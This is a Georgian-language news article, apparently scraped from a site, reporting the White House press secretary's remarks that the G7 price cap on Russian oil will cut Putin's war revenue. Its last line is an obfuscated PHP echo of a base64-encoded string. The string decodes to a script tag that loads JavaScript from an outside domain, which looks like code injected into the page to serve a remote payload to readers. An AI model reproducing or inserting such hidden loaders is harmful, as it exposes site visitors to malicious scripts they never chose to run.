celsiusi
ავერსი საქკაბელი
თეთრი სახლის პრესმდივანმა, კარინ ჟან-პიერმა ბრიფინგზე განაცხადა, რომ რუსულ ნავთობზე ფასის გლობალური შეზღუდვა უკრაინაში მნიშვნელოვნად შეამცირებს პუტინის შემოსავლის წყაროს მისი საომარი ბიუჯეტისთვის.
 
თეთრი სახლის წარმომადგენლის განცხადებით, რუსული ნავთობის ფასზე ზედა ზღვრის დაწესების გადაწყვეტილება ასევე უზრუნველყოფს, რომ ნავთობი ენერგობაზარზე უფრო დაბალ ფასად მოხვდეს.
 
„ნავთობის გლობალური ფასის ზედა ზღვარი დაგვეხმარება ჩვენ ორი მიზნის მიღწევაში. პირველი – მნიშვნელოვნად შეამცირებს პუტინის შემოსავლის წყაროს მისი საომარი ბიუჯეტისთვის. მეორე – უზრუნველყოფს, რომ ნავთობი ბაზარზე უფრო დაბალ ფასად მოხვდეს და მიწოდება შეესაბამებოდეს მოთხოვნას. ფასის ზედა ზღვრის დაწესების ჩვენი ძალისხმევა უკვე ნაყოფს იღებს. ცნობები აჩვენებს, რომ რუსეთი უკვე მნიშვნელოვან, 30 პროცენტამდე ფასდაკლებას და გრძელვადიან კონტრაქტებს სთავაზობს ზოგიერთ ქვეყანას“, – განაცხადა კარინ ჟან-პიერმა.
 
შეგახსენებთ, „ფაინენშელ თაიმსის“ ცნობით, „დიდი შვიდეულის“ ქვეყნების ფინანსთა მინისტრები შეთანხმდნენ, რომ რუსულ ნედლ ნავთობზე ფასის შეზღუდვა 5 დეკემბრიდან ამოქმედდება, ხოლო ნავთობპროდუქტებზე 5 თებერვლიდან.
446
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");